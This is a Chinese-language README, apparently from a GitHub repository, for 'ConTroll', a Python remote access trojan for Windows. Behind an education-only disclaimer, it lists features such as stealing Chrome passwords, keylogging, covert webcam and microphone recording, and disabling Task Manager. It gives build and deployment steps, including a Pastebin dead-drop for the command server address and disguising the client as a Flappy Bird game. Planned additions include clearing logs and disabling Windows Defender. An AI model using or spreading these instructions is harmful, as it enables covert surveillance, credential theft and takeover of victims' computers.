
免责声明
ConTroll 仅用于教育/研究目的。作者对您如何使用任何工具/源代码/任何文件概不负责,也不承担任何责任。作者及其关联方对因使用 ConTroll 提供的任何文件而导致的任何损失和/或损害概不负责。使用 ConTroll 或任何包含的文件,即表示您理解并同意自行承担使用风险。
再次强调,ConTroll 及所有包含的文件仅用于教育和/或研究目的。ConTroll 仅可用于您自己的渗透测试实验室,或在获得被测试财产所有者的明确同意后使用。
ConTroll - 远程访问木马 (RAT)
在此观看演示视频
创建了一个远程访问木马,能够对受感染的 Windows 机器建立管理控制。

自视频演示以来的更新
- 远程更新客户端应连接的 IP 地址和端口
- 在服务器执行时输入 IP 地址
- 禁用任务管理器
功能特性
- 锁定受害者屏幕。
- 自动重新连接到服务器。
- 创建自定义弹窗。
- 从受害者机器抓取文件。
- 获取受害者机器信息。
- 窃取 Chrome 中保存的密码。
- 开启系统摄像头并录制视频。
- 开启系统麦克风并录制音频。
- 终止受害者机器上运行的任何进程。
- 通过键盘记录(按键和截图)监控用户行为。
- 禁用任务管理器。(警告:如果在本地运行,建议禁用此功能)
要求
你需要 32 位操作系统架构来构建二进制文件。因此请使用 Win 32 或 Unix 32 系统来运行和构建代码。
- python 2.x
- opencv
- numpy
- pyhook
- pythoncom
- pyinstaller
- pygame
- py2exe
- pyAudio
使用方法
新的使用方法
设置一个 PASTEBIN 账户,创建一个新的粘贴,内容为你希望客户端发送响应到的 IP 地址和端口号。IP 地址和端口号应用冒号分隔,例如 192.168.12.14:5000。创建粘贴后,点击 Raw,这会将你重定向到一个只包含 IP 地址和端口号的页面;复制该链接并粘贴到 client.pyw 中的 getIpAddress 函数。如果因任何原因你想更新客户端连接的 IP 和/或端口,登录你的 PASTEBIN 账户 并进行更改,保存后客户端将采用这些更改。
- 克隆仓库
git clone https://github.com/Lithium95/ConTroll_Remote_Access_Trojan.git
- 从 requirements.txt 安装 opencv 和 numpy
python -m pip install -r requirements.txt
-
下载并安装 pyHook
-
下载并安装 pythoncom
-
下载 pyAudio wheel
-
安装 wheel 文件
python -m pip install PyAudio-0.2.11-cp27-cp27m-win32.whl
- 使用 pyinstaller 构建客户端二进制文件
python pyinstaller.py --onefile --windowed client.pyw
如果你不想使用 flappy bird 游戏,跳过接下来的 2 步
- 搭建本地服务器来托管 client.exe。使用 live-server
- 使用 py2exe 构建 flappy bird 游戏
flappy bird 游戏的 exe 文件将位于名为 'dist' 的文件夹中
- 运行服务器
- 等待客户端连接
待办事项
- 使 RAT 跨平台
- 清除系统、安全和应用程序日志
- 加密服务器与客户端之间的通信
- 修改文件的访问、创建和修改属性
- 启用/禁用服务,如 RDP、UAC 和 Windows Defender